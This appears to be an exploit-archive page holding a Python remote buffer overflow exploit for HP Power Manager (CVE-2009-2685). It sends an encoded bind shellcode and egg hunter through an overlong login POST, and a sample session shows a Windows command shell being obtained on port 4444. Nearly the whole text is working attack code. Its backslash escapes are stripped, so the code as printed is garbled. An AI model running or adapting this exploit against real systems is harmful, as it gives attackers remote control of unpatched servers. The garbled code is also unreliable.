[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : HP Power Manager Administration Universal Buffer Overflow Exploit
# Published : 2009-11-16
# Author : Matteo Memelli
# Previous Title : Samba 3.0.10 - 3.3.5 Format String And Security Bypass Vulnerabilities
# Next Title : PHP 5.2.11/5.3.0 Multiple Vulnerabilities
#!/usr/bin/python
# HP Power Manager Administration Universal Buffer Overflow Exploit
# CVE 2009-2685
# Tested on Win2k3 Ent SP2 English, Win XP Sp2 English
# Matteo Memelli ryujin __A-T__ offensive-security.com
# www.offensive-security.com
# Spaghetti & Pwnsauce - 07/11/2009
#
# ryujin@bt:~$ ./hppowermanager.py 172.16.30.203
# HP Power Manager Administration Universal Buffer Overflow Exploit
# ryujin __A-T__ offensive-security.com
# [+] Sending evil buffer...
# HTTP/1.0 200 OK
# [+] Done!
# [*] Check your shell at 172.16.30.203:4444 , can take up to 1 min to spawn your shell
# ryujin@bt:~$ nc -v 172.16.30.203 4444
# 172.16.30.203: inverse host lookup failed: Unknown server error : Connection timed out
# (UNKNOWN) [172.16.30.203] 4444 (?) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
# C:WINDOWSsystem32>
import sys
from socket import *
print "HP Power Manager Administration Universal Buffer Overflow Exploit"
print "ryujin __A-T__ offensive-security.com"
try:
HOST = sys.argv[1]
except IndexError:
print "Usage: %s HOST" % sys.argv[0]
sys.exit()
PORT = 80
RET = "xCFxBCx08x76" # 7608BCCF JMP ESP MSVCP60.dll
# [*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes
# badchar = "x00x3ax26x3fx25x23x20x0ax0dx2fx2bx0bx5cx3dx3bx2dx2cx2ex24x25x1a"
SHELL = (
"n00bn00b"
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx36x4bx4e"
"x4dx44x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x46x4bx38"
"x4ex56x46x32x46x42x4bx58x45x34x4ex33x4bx48x4ex47"
"x45x30x4ax37x41x50x4fx4ex4bx38x4fx34x4ax51x4bx38"
"x4fx35x42x32x41x50x4bx4ex49x54x4bx48x46x33x4bx58"
"x41x30x50x4ex41x43x42x4cx49x49x4ex4ax46x58x42x4c"
"x46x37x47x50x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e"
"x46x4fx4bx53x46x55x46x32x4ax52x45x47x45x4ex4bx58"
"x4fx55x46x52x41x50x4bx4ex48x46x4bx58x4ex50x4bx54"
"x4bx58x4fx55x4ex31x41x30x4bx4ex43x50x4ex42x4bx48"
"x49x38x4ex36x46x52x4ex31x41x46x43x4cx41x43x4bx4d"
"x46x46x4bx38x43x54x42x33x4bx38x42x54x4ex30x4bx48"
"x42x37x4ex31x4dx4ax4bx48x42x34x4ax30x50x35x4ax46"
"x50x48x50x34x50x50x4ex4ex42x45x4fx4fx48x4dx48x56"
"x43x45x48x46x4ax36x43x43x44x33x4ax46x47x47x43x57"
"x44x33x4fx55x46x45x4fx4fx42x4dx4ax56x4bx4cx4dx4e"
"x4ex4fx4bx33x42x45x4fx4fx48x4dx4fx55x49x38x45x4e"
"x48x36x41x38x4dx4ex4ax30x44x50x45x35x4cx56x44x50"
"x4fx4fx42x4dx4ax36x49x4dx49x50x45x4fx4dx4ax47x35"
"x4fx4fx48x4dx43x55x43x55x43x35x43x45x43x35x43x34"
"x43x35x43x54x43x45x4fx4fx42x4dx48x46x4ax46x41x41"
"x4ex35x48x46x43x55x49x58x41x4ex45x39x4ax36x46x4a"
"x4cx31x42x47x47x4cx47x35x4fx4fx48x4dx4cx46x42x51"
"x41x35x45x55x4fx4fx42x4dx4ax46x46x4ax4dx4ax50x42"
"x49x4ex47x45x4fx4fx48x4dx43x55x45x55x4fx4fx42x4d"
"x4ax56x45x4ex49x54x48x58x49x54x47x45x4fx4fx48x4d"
"x42x55x46x45x46x45x45x35x4fx4fx42x4dx43x59x4ax46"
"x47x4ex49x57x48x4cx49x47x47x55x4fx4fx48x4dx45x35"
"x4fx4fx42x4dx48x46x4cx36x46x56x48x56x4ax46x43x36"
"x4dx46x49x58x45x4ex4cx56x42x55x49x35x49x52x4ex4c"
"x49x58x47x4ex4cx56x46x54x49x38x44x4ex41x43x42x4c"
"x43x4fx4cx4ax50x4fx44x34x4dx32x50x4fx44x34x4ex42"
"x43x59x4dx38x4cx57x4ax33x4bx4ax4bx4ax4bx4ax4ax56"
"x44x57x50x4fx43x4bx48x51x4fx4fx45x47x46x34x4fx4f"
"x48x4dx4bx35x47x45x44x35x41x55x41x45x41x35x4cx56"
"x41x30x41x55x41x45x45x35x41x35x4fx4fx42x4dx4ax56"
"x4dx4ax49x4dx45x50x50x4cx43x35x4fx4fx48x4dx4cx36"
"x4fx4fx4fx4fx47x43x4fx4fx42x4dx4bx58x47x45x4ex4f"
"x43x58x46x4cx46x46x4fx4fx48x4dx44x45x4fx4fx42x4d"
"x4ax36x4fx4ex50x4cx42x4ex42x56x43x45x4fx4fx48x4d"
"x4fx4fx42x4dx5a")
EH ='x33xD2x90x90x90x42x52x6a'
EH +='x02x58xcdx2ex3cx05x5ax74'
EH +='xf4xb8x6ex30x30x62x8bxfa'
EH +='xafx75xeaxafx75xe7xffxe7'
evil = "POST http://%s/goform/formLogin HTTP/1.1rn"
evil += "Host: %srn"
evil += "User-Agent: %srn"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn"
evil += "Accept-Language: en-us,en;q=0.5rn"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7rn"
evil += "Keep-Alive: 300rn"
evil += "Proxy-Connection: keep-alivern"
evil += "Referer: http://%s/index.asprn"
evil += "Content-Type: application/x-www-form-urlencodedrn"
evil += "Content-Length: 678rnrn"
evil += "HtmlOnly=true&Password=admin&loginButton=Submit+Login&Login=admin"
evil += "x41"*256 + RET + "x90"*32 + EH + "x42"*287 + "x0dx0a"
evil = evil % (HOST,HOST,SHELL,HOST)
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print '[+] Sending evil buffer...'
s.send(evil)
print s.recv(1024)
print "[+] Done!"
print "[*] Check your shell at %s:4444 , can take up to 1 min to spawn your shell" % HOST
s.close()